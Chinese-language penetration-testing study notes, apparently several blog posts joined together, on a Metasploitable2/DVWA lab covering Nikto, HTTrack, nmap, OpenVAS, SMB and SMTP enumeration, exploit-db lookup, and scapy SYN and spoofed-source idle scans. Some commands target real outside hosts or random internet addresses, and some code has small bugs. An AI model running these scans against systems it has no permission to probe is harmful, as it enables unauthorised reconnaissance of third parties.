这是基于linux的一个靶机测试环境，我是一个喜欢与时俱进的人，什么东西都喜欢用最新版本的，但是Metasploitable3太不好装了，而且网上的教程写的不是很详细，遂放弃。Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统，本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载，并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware，VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only，本镜像一定不要暴漏在一个易受攻击的网络中。下面是安装过程： 首先下载一个压缩包：http://downloads.metasploit.c...解压在virtualbox中新建一个虚拟机，Linux 64B的，类型选其他， 然后选择刚才解压后文件夹里面的.vmdk文件 默认登录名:msfadmin 密码:msfadmin通过ifconifg查看默认IP地址，Metasploit的默认端口是192.168.1.107，首次使用默认的metasploitable需要进行一项配置，否则会造成所有测试失败: 这一步费了我好长时间，差点把键盘砸了，下面是我的更改过程 cd /var/www/mutillidae sudo vi config.inc 输入顺序为：->i $dbname一项改为“owasp10”:->wq!

首先获得metasploitable的ip地址：192.168.86.130Kali的ip地址:192.168.86.134然后访问Metasplotiabel的ip地址，进入Dvwa应用网站，选择DVWA Security的安全等级选择为low。基于之前的渗透方法，现在要更进一步的减少与目标主机的交互。Htttrack可以将目标网站克隆下来，以实现离线分析目标网站 NiktoNikto是一个用来发现默认网页文件、检查网页服务器和CGI安全问题的工具，它是开源的，使用Perl开发，可以对网页服务器进行全面的多种扫描，包含超过3300种有潜在危险的文件CGIs；超过625种服务器版本；超过230种特定服务器问题；以及一些WEB Application层面的漏洞它也会去扫描。 避免404误判很多服务器不遵守RFC标准，比如对于不存在的对象返回200相应代码。那么当扫描器遇到这种情况下便会产生误判。扫描器是如何尝试解决的？Nikto的解决方发是:在开始扫描以前，在每条命令执行之前，会在自己的数据库中将web中常见文件的扩展名提取出来，随机使用一些文件名拼接这些扩展名(这些随机的文件名+扩展名的文件对于目标服务器来说通常是不存在的)让后再向目标服务器发起请求。然后根据不同扩展名返回的信息，进行HASH摘要，以此得到该文件不存在时得到的响应信息。然后Nikto再开始真正的扫描发起。如果这些还是不能得到404响应的真实性，那么最新版本的Nikto还会将得到的响应内容去除时间信息后取得MD5值进行hash校验。同时也可以使用参数-no404，去掉前期判断，但是这种提高性能而舍弃准确率的做法，并不建议。 Nickto的使用首先升级Nikto: $: nikto -update但是由于wall的存在，不一定能更新成功，此时可以访问到Nikto官网下载安装包:http://cirt.net/nikto/UPDATES. nikto host 扫描root@kali:~# nikto -host 192.168.86.130 -port 80nikto 进行ssl扫描root@kali:~# nikto -host www.baidu.com -port 443 -ssl-ouput 将扫描结果输出保存 对host列表进行批量扫描$: nikto host -host.txt-host.txt 的文本格式如下: 192.168.0.1:80https://192.168.1.1:8333192.168.0.2nmap配合nikto将nmap获得的ip地址结果作为输出通过管道传送给nikto $: nmap -p80 192.168.1.4/24 -oG - | nikto -host -nikto代理nikto可以通过代理扫描： $: nikto -host https://www.baidu.com -useproxy htpp://localhost:1080nikto的配置文件有些网站需要登录以后才可以进行扫描，此时可以设置nikto的配置文件手动将cookie添加到nikto的中。nikto的配置文件如下： $: vi /etc/nikto.conf########################################################################################################## CONFIG STUFF# $Id: config.txt 94 2009-01-21 22:47:25Z deity $########################################################################################################## default command line options, can't be an option that requires a value. used for ALL runs.# CLIOPTS=-g -a# ports never to scanSKIPPORTS=21 111# User-Agent variables: # @VERSION - Nikto version # @TESTID - Test identifier # @EVASIONS - List of active evasionsUSERAGENT=Mozilla/5.00 (Nikto/@VERSION) (Evasions:@EVASIONS) (Test:@TESTID)# RFI URL. This remote file should return a phpinfo call, for example: <?php phpinfo(); ?># You may use the one below, if you like.RFIURL=http://cirt.net/rfiinc.txt?# IDs never to alert on (Note: this only works for IDs loaded from db_tests)#SKIPIDS=# The DTDNIKTODTD=/var/lib/nikto/docs/nikto.dtd# the default HTTP version to try... can/will be changed as necessaryDEFAULTHTTPVER=1.0# Nikto can submit updated version strings to CIRT.net. It won't do this w/o permission. You should# send updates because it makes the data better for everyone ;) *NO* server specific information# such as IP or name is sent, just the relevant version information.# UPDATES=yes - ask before each submission if it should send# UPDATES=no - don't ask, don't send# UPDATES=auto - automatically attempt submission *without prompting*UPDATES=yes# Warning if MAX_WARN OK or MOVED responses are retrievedMAX_WARN=20# Prompt... if set to 'no' you'll never be asked for anything. Good for automation.#PROMPTS=no# cirt.net : set the IP so that updates can work without name resolution -- just in caseCIRT=107.170.99.251# Proxy settings -- still must be enabled by -useproxy#PROXYHOST=127.0.0.1#PROXYPORT=8080#PROXYUSER=proxyuserid#PROXYPASS=proxypassword# Cookies: send cookies with all requests# Multiple can be set by separating with a semi-colon, e.g.:# "cookie1"="cookie value";"cookie2"="cookie val" #STATIC-COOKIE=# The below allows you to vary which HTTP methods are used to check whether an HTTP(s) server # is running. Some web servers, such as the autopsy web server do not implement the HEAD methodCHECKMETHODS=HEAD GET# If you want to specify the location of any of the files, specify them hereEXECDIR=/var/lib/nikto # Location of NiktoPLUGINDIR=/var/lib/nikto/plugins # Location of plugin dirDBDIR=/var/lib//nikto/databases # Location of database dirTEMPLATEDIR=/var/lib/nikto/templates # Location of template dirDOCDIR=/var/lib/nikto/docs # Location of docs dir# Default plugin macros@@MUTATE=dictionary;subdomain@@DEFAULT=@@ALL;-@@MUTATE;tests(report:500)# Choose SSL libs: # SSLeay - use Net::SSLeay # SSL - use Net::SSL # auto - automatically choose whats available # (SSLeay wins if both are available) LW_SSL_ENGINE=auto# Number of failures before giving upFAILURES=20User-Agent: 默认的是firefox浏览器。此外还可以下载firefox的User-Agent插件，比如基于freifox浏览器的User-Agent Switcher可以进行移动端，PC端，以及操作系统的组合伪装。# User-Agent variables: # @VERSION - Nikto version # @TESTID - Test identifier # @EVASIONS - List of active evasionsUSERAGENT=Mozilla/5.00 (Nikto/@VERSION) (Evasions:@EVASIONS) (Test:@TESTID)Proxy settings:代理设置# Proxy settings -- still must be enabled by -useproxyPROXYHOST=127.0.0.1PROXYPORT=1080#PROXYUSER=proxyuserid#PROXYPASS=proxypasswordcookies设置将已经登录网站的cookies存放再nikto.conf中，便可以登陆该网站了。随便打开一个网站，对该网站启用Firebug，并启用cookies功能，登录该网站，分析cookies信息，比如百度，分析firebug的cookies项可以看到过期时间(Expires)，将过期时间下对应的有会话(Session)字段的项中的名称(Name)和内容(Value)copy，添加到/etc/nikto.conf中 ...

DVWA　DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 可以设置不同难度的演练模式，low，medium，hight，low模式下的漏洞较多并且容易发现。 HttrackHTTrack Website Copier是一个免费并易于使用的线下浏览器工具,它能够让你从互联网上下载整个网站进行线下浏览。浏览线下站点和线上并没有什么不同。HTTrack同样可以进行线下线上站点同步,支持断点续传。使用Httrack可以将一个网站拷贝下来，以此进行下线的探测发现，以此减少对目标网站的直接交互。Httrack的使用很简单，只需要根据其向导按步骤进行就好了。 root@kali:~# httrackWelcome to HTTrack Website Copier (Offline Browser) 3.48-21Copyright (C) 1998-2015 Xavier Roche and other contributorsTo see the option list, enter a blank line or try httrack --helpEnter project name :Dvwa#工程名称Base path (return=/root/websites/) :/root/httrackWeb#这是一个大的目录，所有httrackcopy网将会根据域名或者ip分为不同的小路径Enter URLs (separated by commas or blank spaces) :http:192.168.86.130/dvwa/#要copy的网站地址Action:(enter) 1 Mirror Web Site(s)#直接镜像 2 Mirror Web Site(s) with Wizard#在向导指示下进行镜像 3 Just Get Files Indicated#获得特定文件的格式文件比如doc，pdf 4 Mirror ALL links in URLs (Multiple Mirror)#惊醒当前url下的所有连接 5 Test Links In URLs (Bookmark Test)#测试连接 0 Quit:2Proxy (return=none) :#代理地址You can define wildcards, like: -*.gif +www.*.com/*.zip -*img_*.zipWildcards (return=none) :You can define additional options, such as recurse level (-r<number>), separed by blank spacesTo see the option list, type helpAdditional options (return=none) :---> Wizard command line: httrack http:192.168.86.130/dvwa/ -W -O "/root/httrackWeb/Dvwa" -%v Ready to launch the mirror? (Y/n) :yWARNING! You are running this program as root!It might be a good idea to run as a different userMirror launched on Sun, 31 Jul 2016 05:12:03 by HTTrack Website Copier/3.48-21 [XR&CO'2014]mirroring http:192.168.86.130/dvwa/ with the wizard help..Done.Thanks for using HTTrack!*

目标发现-iL 添加扫描待ip列表文件-iR 随机选择目标不用指定目标ip，nmap对自动对全球的ip随机选择100个进行扫描 root@kali:~# nmap -iR 100 -p100--exclude 排除扫描当想要对某个ip地址段进行扫描，但是并不扫描其中特定的一些ip root@kali:~# nmap 192.168.1.0/24 --exclude 192.168.1.1-100--excludefile从文件列表中排除不需要扫描的ip主机发现-sn ping扫描，不扫描端口-Pn 完全扫描（穿透防火墙）-PS/PA/PU/PY[portlist]，协议扫描，TCP，SYN/ACK,UDP or SCTP ，基于上述协议去进行扫描端口-PO[protocol list] 使用ip协议扫描-n/-R -n：不进行nds解析-R：对其进行反向解析--dns-servers 更换DNS服务器 <serv1[,serv2],...>: Specify custom DNS servers 更换系统默认DNS服务器，以得到不同的扫描结果 root@kali:~# nmap --dns-servers 8.8.8.8 www.sina.com--traceroute 路由追踪，基本等同于traceroute命令 root@kali:~# nmap www.baidu.com --traceroute -p80端口发现-sS/sT/sA/sW/sM 基于TCP的端口发现TCP SYN Connect() ACK Window Maimon scans基于TCP的SYN 全连接 ACK 窗口 Maimon 扫描-sU 基于UPD协议的扫描，但是UDP的扫描的准确率并不高-sN/sF/sX 基于TCP的空/finish/xmas的扫描--scanflags <flags>，其实以上对于TCP的扫描都是对tcpflags位的组合，所以我们自然是可以自定义组合的。-sI 僵尸扫描，<zombie host[:probeport]>: Idle scan-sY/sZ 基于SCTP协议(少用)，SCTP INIT/COOKIE-ECHO scans-b 基于FTP的中继扫描，<FTP relay host>: FTP bounce scan指定端口和扫描菜单-p 扫描特定类型端口/范围<port ranges>: Only scan specified portsEx: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9--exclude-ports 排除不需扫描的端口范围<port ranges>: Exclude the specified ports from scanning-F 快速扫描Fast mode - Scan fewer ports than the default scan-r 按顺序扫描Scan ports consecutively - don't randomize如果我们对1-1000个端口发起扫描，namp默认会在每次扫描中随机选择，-r会使namp按照从大到小的顺序进行。--top-ports <number>只扫描常用端口的top n服务/版本探测-sVProbe open ports to determine service/version info-sV会使用nmap中的大量特征库去进行探测比对--version-intensity<level>: Set from 0 (light) to 9 (try all probes)虽然-sV会nmap会调用自身大量的特征库资料去进行匹配，但是这样势必会增加比对的时间成本，所以我们可以探测阶段扫描的强度去最大限度的节省扫描的时间成本。--version-traceShow detailed version scan activity (for debugging)对扫描过程进行跟踪，显示扫描的具体过程SCRIPT SCAN 脚本扫描-sC: equivalent to --script=default--script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories，=后面接具体的脚本名称--script-args=<n1=v1,[n2=v2,...]>provide arguments to scripts，=后面接脚本扫描的参数--script-traceShow all data sent and received，脚本扫描追踪--script-updatedbUpdate the script database.更新nmap脚本库中的文件--script-help=<Lua scripts>Show help about scripts.<Lua scripts> is a comma-separated list of script-files or script-categories.对于一个陌生脚本时可以使用--script-help来查看该文件的使用说明 ...

简介Openvas是开源的，是Nessus项目分支，用于管理目标系统的漏洞的同时也可以进行攻击渗透。Kali默认安装，但未配置和启动。Openvas的更新很快，并且配置比较复杂，基于此，也许Openvas并不为大多数人所知。 配置过程Kali Rolling版本已经没有默认安装Openvas了，需要重新下载: 安装Openvasapt-get install openvas开始配置Openvasopenvas-setup检查安装结果openvas-check-setup查看当前账号openvasmd --list-users修改账号密码openvas --user=admin --new-password=Password升级Openvasopenvas-feed-updateopenvas开放的端口netstat -pantu | grep 939其中9390是openvas的manager端口号，9391是openvas第一个默认安装的第一个扫描器的端口号，9392是openvas的web登录界面。有时openvas会加载失败，导致family与NVT加载失败，使用openvas-setup才可以从新打开。 openvas的web页面登录openvas web界面:https://127.0.0.1:9392值得注意的是，openvas不会随着kali自动启动，所以我们需要每次自行启动openvas服务: $: /usr/bin/openvas-startExtras->MySetting，这里可以对我们的openvas进行设置。 Openvas使用使用openvas进行扫描操作之前需要配置扫描策略(Configuration)。 登录openvas界面后选择Configuration菜单下的Scan configs可以看到openvas已经默认集成了多种扫描策略: Discover: 只对目标系统进行发现扫描。empty: 空策略，不进行任何操作。Full and fast:全面的快速的扫描Full and fast ulitimate:全面的快速的极限扫描Full and very deep:全面的深度扫描Full and very deep ultimate:全面的极限深度扫描Host Discovery:主机发现System Discovery:系统识别通常情况下我们会选择Full and Fast策略，它的families类型会达到56，NTV数量可以达到40000多个。也可以自定义扫描策略. Openvas 自定义扫描策略创建一个只针对windows的扫描策略选择菜单栏的星号，可以进行自定义的扫描策略。进入Confiuration选项点击Scan configs后再点击菜单栏中的星号图标可进行New Scan Configuration操作。然后设置好策略的名称，在Edit Network Vulnerability Test Families中选择需要的family类型，每一个family代表一种漏洞类型，该类型下会集成多个NVTS。然后勾选Selext all NVTs选项为策略添加该families。还注意到Family_旁有斜着(DYNAMIC)和横(STATIC)着的两个箭头，选择DYNAMIC意味着当openvas官方发布该Family下新的NVTS时，策略会自动添加新的NVTS。由于只是针对windows系统的扫描，所以我们会选择如下的Families: Brute force attacks:暴力破解漏洞，该family不仅仅对windows有效，linux同样适用。Buffer overflow:缓存区溢出漏洞CompianceDatabse:数据库Default Accpunts:默认账号Default Service:默认服务FTP:FInger abuses:Firewall:Gain a shell rmotelyGeneralMalware恶意软件Nmap NSE：NAMP的恶意扫描脚本Nmap NET NSEPeer-To-PeerPolicyPort scannersPrivilege escalationProduction detetionRPCSMTP problemsSNMPService detectionSettingsUseless servicesWeb ServersWeb application abusesWindowsWidows:Microsoft Bulletins ...

nmap里面的关键字为vuln的脚本，是用来扫描漏洞的脚本。可以每个都试着用一用

SMB(Server Message Block)协议，服务消息块协议，最开始是用于微软的一种消息传输协议，因为颇受欢迎，现在已经成为跨平台的一种消息传输协议。同时也是微软历史上出现安全问题最多的协议。它的实现复杂，并且默认在所有windows上开放。 nmap  smb扫描nmap -v -p139,445 192.168.0.105SMB常用的端口有两个139和445，较新的操作系统会使用445端口。不能简单的单凭一个端口就去断定OS一定是windows的。NMAP提供了更高级的扫描方式。 root@kali:~# nmap 192.168.86.132 -p139,445 --script=smb-os-discovery.nse PORT STATE SERVICE139/tcp open netbios-ssn445/tcp open microsoft-dsMAC Address: 00:0C:29:10:88:B3 (VMware) Host script results:| smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager)| OS CPE: cpe:/o:microsoft:windows_xp::-| Computer name: my-xp| NetBIOS computer name: MY-XP| Workgroup: WORKGROUP|_ System time: 2016-06-10T18:49:22-07:00 同样上一个机器只是用来发现机器上是否有运行SMB协议的，但仅仅是发现远远不够，还可以更高效使用nmap去发现该端口是否有漏洞存在: nmap -v -p135,445 --script=smb-check-vulns --script-args=unsafe=1 hosts -Pn脚本smb-check-vulns对目标进行smb漏洞检查脚本smb-check-vulns可以携带参数对其进行unsafe扫描-Pn：尝试绕过防火墙unsafe将会对目标主机造成较大破坏，需警慎使用。以上脚本信息都是只针对windows nbtscannbtscan优势在于可以在同意局域网下进行跨网段扫描，比如主机所在网段为192.168.1.,nbscan可以对192.168.86.所在网段的主机进行扫描。 root@kali:~# nbtscan -r 192.168.0.1enum4linux在linux上枚举出windows的命令，同样可以进行跨网段的扫描，并且扫描返回的信息量比较多。但是它不支持大范围的网路扫描 root@kali:~# enum4linux -a 192.168.86.132

SMTPSMTP扫描最主要的作用是发现目标主机上的邮件账号。通过主动对目标的SMTP（邮件服务器）发动扫描。 首先可以使用nc去尝试连接目标邮件服务器，然后使用VRFYroot命令探测目标是否有root账号。 NMAP SMTP扫描在使用NMAP扫描SMTP之前需要确认对方SMTP端口已经开放了的，这便需要前期的端口扫描了。然后便可以使用NMAP调用与之有关的smtp脚本对其进行扫描了。 root@kali:~# nmap smtp.163.com -p25 --script=smtp-enum-users.nse --script-args= smtp-enum-users.methods={VRFY}#返回结果，并没有发现账号|_ Couldn't find any accountsNMAP中与smtp扫描有关的脚本程序是smtp-enum-users.nse参数:smtp-enum-users.methods={VERY}实际上是指定使用什么方式对其smtp账号进行验证。这里使用能了VERY的方法。 此外我们除了扫描smtp的用户账号之外，还可以扫描smtp是否开放中继，就是可以使用邮件服务器中的账号对任意账号发送邮件。 

exploit-db.com这个网站适合找漏洞，进行漏洞利用。只需要搜索版本信息，就可以出来很多的已知漏洞。可以说，这就是一个漏洞库。另外，kali中也可以找出大量的漏洞利用代码，就是用searchsploit tomcat类似的命令，就可以搜到tomcat的各种漏洞利用代码： 另外一个搜集漏洞利用代码的工具叫做sandi，很强大的一个工具。但是在kali2.0里面需要自己手动安装。他可以在三个平台上搜索攻击代码。 总结：1.弱点扫描的目的就是为了发现漏洞。通常的流程是主机发现-端口发现-服务发现-根据版本信息，搜集exp代码2.nmap等工具进行主机发现，端口服务发现。根据得到的信息，比如是tomcat还是什么中间件，去exploit-db或者用sandi去搜利用代码

通过上一篇得到正在开放的端口，是不能绝对的认定哪个端口对应的就是某个服务软件或者协议的端口，这不是绝对的。 下面扫描一些对应端口所开放的服务。 Banner信息通过banner信息可以获得包括软件开发商，软件名称，服务类型，版本号等信息，有可能通过已知的漏洞和弱点直接渗透到目标主机，当然所有的信息都可能不是真实的，所有有必要结合一些另类的服务识别方法，比如，特征识别和响应字段，而不同的响应可用于识别底层的操作系统。除此外，若想获得对方的banner 信息，就必须通过直接连接的方法。简单网络管理协议SNMP大概是所有网络管理员配置起来最容易出错的一项服务了。识别防火墙并绕过Python Socket获取Banner信息最简单的就是通过nv来简单查看一下。Scapy最主要的作用是向网络里注入数据包，但是它缺乏对应用层的支持，比如很难去发送一个http包，ssh包，它主要针对于三四层网络中包的注入，劫持，嗅探。此时便需要通过Scoket与目标进行tcp连接，以进行更多的应用层的信息传输。进入Python，导入Scoket模块:构建一个最简单的Socket连接 >>> import socket#这是一个建立socket的标准指令方式#创建一个socket对象，并构建一个banner实例，用以建立一个tcp连接，SOCK_STREAM代表tcp连接>>> banner = socket.socket(socket.AF_INET, socket.SOCK_STREAM)#连接目标端口>>>banner.connect(("192.168.0.101", 21))#指定接收数据的大小>>>banner.recv(4096)#关闭连接>>>banner.close()Python脚本实现Banner信息获取#!/usr/bin/python#-*-coding:utf-8-*- import socketimport selectimport sys if len(sys.argv)!=4: print"Usage __ /banner_get.py [Target -IP]j [Fisrst Port] [Last Port]" print"Example __ /banner_get.py 1.0.1.0 1 100" print"Example will get banner for TCP ports 1 through 100 on 10.0.0.5" sys.exit() ip = sys.argv[1]start = int(sys.argv[2])end = int(sys.argv[3]) for port in range(start, end): try: banget = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #表示建立tcp连接 banget.connect((ip.port)) ready = select.select([banget],[],[],1)#若超时时间为1 if ready[0]:#如果ready=0表示没有被挂起的 print"TCP Port"+str(port)+"."+banget.recv(4096) banget.close() #记得关闭连接，否则对双方来将都是一种伤害 except: passNMAP获得Banner信息NMAP获得banner信息主要是使用了一个banner脚本（nmap自带的） ...

其基本功能有三个：（1）是扫描主机端口，嗅探所提供的网络服务 （2）是探测一组主机是否在线 （3）还可以推断主机所用的操作系统，到达主机经过的路由，系统已开放端口的软件版本 nmap端口状态解析open ： 应用程序在该端口接收 TCP 连接或者 UDP 报文。  closed ：关闭的端口对于nmap也是可访问的， 它接收nmap探测报文并作出响应。但没有应用程序在其上监听。 filtered ：由于包过滤阻止探测报文到达端口，nmap无法确定该端口是否开放。过滤可能来自专业的防火墙设备，路由规则 或者主机上的软件防火墙。 unfiltered ：未被过滤状态意味着端口可访问，但是nmap无法确定它是开放还是关闭。 只有用于映射防火墙规则集的 ACK 扫描才会把端口分类到这个状态。 open | filtered ：无法确定端口是开放还是被过滤， 开放的端口不响应就是一个例子。没有响应也可能意味着报文过滤器丢弃了探测报文或者它引发的任何反应。UDP，IP协议,FIN, Null 等扫描会引起。 closed|filtered：（关闭或者被过滤的）：无法确定端口是关闭的还是被过滤的 nmap常用参数 nmap扫描速度要比nc快 下面是一些基本的命令和它们的用法的例子：扫描单一的一个主机，命令如下： 前期准备 准备两台机器 主机A：ip地址 10.0.1.161 主机B：ip地址 10.0.1.162 端口扫描前期准备 B机器使用nmap去扫描A机器，扫描之前，A机器先查看自己上面有哪些端口在被占用 A机器上查看本地ipv4的监听端口   netstat参数解释： -l  (listen) 仅列出 Listen (监听) 的服务 -t  (tcp) 仅显示tcp相关内容 -n (numeric) 直接显示ip地址以及端口，不解析为服务名或者主机名 -p (pid) 显示出socket所属的进程PID 以及进程名字 --inet 显示ipv4相关协议的监听   查看IPV4端口上的tcp的监听 netstat -lntp --inet[root@A ~]# netstat   -lntp    --inetActive Internet connections (only servers)Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name  tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      2157/sshd          tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      1930/cupsd         tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      2365/master        tcp        0      0 0.0.0.0:13306               0.0.0.0:*                   LISTEN      21699/mysqld       tcp        0      0 0.0.0.0:873                 0.0.0.0:*                   LISTEN      2640/rsync         tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      21505/rpcbind      [root@A ~]#过滤掉监控在127.0.0.1的端口 ...

pingping使用的是ICMP协议 ping -c 4 192.168.0.1参数-c指定发送数据包的数量，-R列出途中经过的路由器IP traceroute列出途中经过的路由器IP fpingfping -c 4 192.168.0.1fping优于ping的一点是ping不支持对一个IP地址段进行扫描的功能，而fping可以 fping -g 192.168.0.1 192.168.0.10或者 fping -c 1 -g 192.168.0.0/24hping3其中 -1参数可以换成--icmp，意为使用icmp模式

netdiscover用于二层发现，分为主动和被动探测 主动探测（容易触发警报）： netdiscover -i eth0 -r 192.168.0.0/24其中-i是指定网卡，-r扫描一个地址段 被动探测（不发送任何东西，仅侦听）：

一个合格的僵尸机是实现僵尸扫描的关键因素，僵尸至少要保证在进行扫描阶段不会产生其它的IP包，即是不会与我们主机之外的任何机器进行第三层的IP通讯，至少在我们控制其进行扫描的阶段不可以，否则将直接导致IPID的数值增大何为合适的僵尸机:1)足够闲置;2）它的IPID必须是递增的，0和随机都不可以。然而现在大部分主流的OS的IPID都是随机产生的，但是早期的xp，比如xp2000，xp2003都是递增的IPID。 僵尸扫描的过程三次握手： 僵尸扫描过程： 扫描者主机对Zombie(僵尸机)发送SYN/ACK包，然后Zombie（假设此时系统产生的IPID为x）会回给主机一个RST，主机将会得到Zombie的IPID，然后扫描主机向目标机器发送一个SYN包，有所不同的是，此时扫描主机会伪造一个伪装成Zombie的IP(即是x)向目标主机发送SYN包。如果目标的端口开放，便会向Zombie返回一个SYN/ACK包，但是Zombie并没有发送任何包，zombie会向目标主机发送RST，此时Zombie的IPID将会增加1：x+1，最后，扫描者主机对Zombie(僵尸机)发送SYN/ACK包，然后Zombie会回给主机一个RST，此时IPID=x+2 若果目标主机的端口并未开放，那么目标主机也会向Zombie发送一个RST，但是Zombie收到RST包不会有任何反应，所以IPID不会改变(依旧是x)。最后扫描者主机再向Zombie发送一个SYN/ACK，同样的Zombie会向扫描者主机发送一个RST包，此时Zombie的IPID将变成(x+1).通过IPID的数值来判断目标机器的端口是否开放 测试扫描主机 kali: ip:192.168.0.5  zombie kali: ip:192.168.0.6  目标主机 Windows:  ip:192.168.0.7  scapy实现僵尸扫描构造request zombie包: >>> i=IP() #构造ip包头>>> t=TCP() #构造tcp包头>>> rz=(i/t) #request_zombie，构造发送给僵尸机的数据包，将发送给zombie Kali>>> rt=(i/t) #request_target,构造发送给目标主机的数据包，将发送给windows>>> rz[IP].dst="192.168.0.6"//定义zombie的ip地址>>> rz[TCP].dport=445 //定义发送到zombie的端口，务必确保这个端口是开启的端口，445端口是win中默认开启的>>> rz[TCP].flags="SA"//定义向zombie发送的数据包是SYN/ACK包构造request target包: >>> rt[IP].src="192.168.0.6"//定义rt包的源ip地址，直接伪造为zombie Kali的IP>>> rt[IP].dst="192.168.0.7"//定义rt包的目的ip，就是目标windows的IP>>> rt[TCP].dport=25//定义rt包扫描的端口>>> rt[TCP].flags="S"//定义发送的rt包为SYN包然后将会发送两次rz包，一次rt包，最后在对结果进行分析。 >>>az1=sr1(rz) #向zombie发第一个包Begin emission:Finished to send 1 packets.*Received 1 packets, got 1 answers, remaining 0 packets >>>at=sr1(rt，timeout=1) #向目标机发包，由于我们不会收到回包，因为给zombie了，所以需要设置超时时间Begin emission:Finished to send 1 packets.*Received 1 packets, got 1 answers, remaining 0 packets >>>az2=sr1(rz) #向zombie发送第二个包Begin emission:Finished to send 1 packets.*Received 1 packets, got 1 answers, remaining 0 packets分析az1与az2的IPID: ...

发现的目的是扫描出可能存活的IP地址，四层发现虽然涉及端口扫描，但是并不对端口的状态进行识别，其本质是利用四层协议的一些通信来识别主机ip是否存在 TCP探测传统TCP连接是通过三次握手建立通信过程，然后可以向目标发送资源申请的请求，本机再发送ack进行确认，这是一种基于连接的可靠的通信协议。如果我们之前没有建立TCP连接，而是直接向目标发送ack，这时目标服务器回想本机发送一个RST包进行拒绝，因此，当目标服务器拒绝时，便可以基于次探测目标主机是否存在了！也可以通过三次握手建立通信连接，通过发送的SYN包来确定目标主机是否在线。 UDP探测UDP不同于TCP，UDP没有通过握手建立连接的过程，UDP只是尽力而为而已，它是一种非连接的不可靠传输协议，因此基于UDP来探测主机，难度和发现的准确率都高于TCP。同样是基于UDP的一些特征信息来探测。 如果目标IP不在线，那我们对其发送的UDP包不会有任何的回应，但假如目标IP在线，而且发送到UDP的目标端口处于开放状态，一般说来，这时目标主机接受到我的UDP包时也不会有任何回应，但有一种列外，即是目标端口没有开放时，会向我们发送一个ICMP不可达的包(但是到这里我们并不对其端口进行扫描) Scapy构造四层TCP探测数据包将TCP包头的flag位设定为ACK，然后发送给一个目标/端口，最后判断是否收到RST响应包，以此确定目标IP是否在线。无论是基于几层的探测扫描，得到结果也只不过是一种极大可能的参考，一切都可能不是真实的 先构造三层ip包，再构成四层tcp，然后将三层/四层组合起来构成一个TCP包 root@:~# scapy >>> i=IP()>>> t=TCP()>>> r=(i/t)>>> r.display()###[ IP ]### version= 4 ihl= None tos= 0x0 len= None id= 1 flags= frag= 0 ttl= 64 proto= tcp chksum= None src= 127.0.0.1 dst= 127.0.0.1 \options\###[ TCP ]### sport= ftp_data dport= http seq= 0 ack= 0 dataofs= None reserved= 0 flags= S window= 8192 chksum= None urgptr= 0 options= [] >>> r[IP].dst="192.168.1.1">>> r[IP].dst="19>>> r[IP].dst="192.168.1.1">>> r[TCP].flags="A">>> r.display()###[ IP ]### version= 4 ihl= None tos= 0x0 len= None id= 1 flags= frag= 0 ttl= 64 proto= tcp chksum= None src= 192.168.0.108 dst= 192.168.1.1 \options\###[ TCP ]### sport= ftp_data dport= http seq= 0 ack= 0 dataofs= None reserved= 0 flags= A window= 8192 chksum= None urgptr= 0 options= []>>> 发包： ...

相比于UDP的端口扫描，基于TCP的扫描将会复杂很多。TCP的扫描方式都是基于连接的三次握手的变化来判断目标端口的状态。TCP可以进行隐蔽扫描，僵尸扫描(比隐蔽扫描更隐蔽的扫描方式)，全连接扫描(基于完整的三次握手) 隐蔽扫描不建立完整的连接，而是只发送SYN包，如果对方回复ACK表示目标端口是开放的，如果回复RST表示目标端口未开放，接下来不再发送第三次的ACK确认，由此也不会建立起正常的TCP连接，应用层日志不会有任何记录，但是网络层有迹象可循 僵尸扫描极度隐蔽，但是实施条件苛刻，可伪造源地址。僵尸扫描的苛刻条件之一就是发起方必须伪造IP地址；二是选择的僵尸机必须是闲置状态的并且这些操作系统的IPID(ip包头里的ip字段)必须是递增的，IPID不能是随机的或者永远是0 隐蔽端口扫描扫描环境：Kali_64B ：192.168.0.108Kali_64B_Target: 192.168.0.110win10: 192.168.0.107用Kali_64B来扫描Kali_64B_Target和win10的端口：首先在Kali_64B中利用scapy制作一个基于TCP的SYN包(不指定端口的情况下扫描的是80端口)： res=sr1（IP（dst="192.168.0.103"）/TCP（flags="S"），timeout=1，verbos=0）flags=RA（RST+ACK），即端口关闭指定目标端口进行扫描： res=sr1(IP(dst="192.168.0.103")/TCP(flags="S",dport=22),timeout=1)22端口也没开scapy脚本扫描: #!/usr/bin/python import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * if len(sys.argv) != 4: print "Usage - ./udp_port.py [Target - TP] [First port] [Last port]" print "Usage - ./udp-port.py 128.13.34.13 1 100" sys.exit() ip = sys.argv[1] start = int(sys.argv[2]) end = int(sys.argv[3]) for port in range(start, end): a = sr1(IP(dst=ip)/TCP(dport=port),timeout=1,verbose=0) if a == None: pass else: if int(a[TCP].flags) == 18: print port else: pass目标机如果开了防火墙，扫不到端口 ...

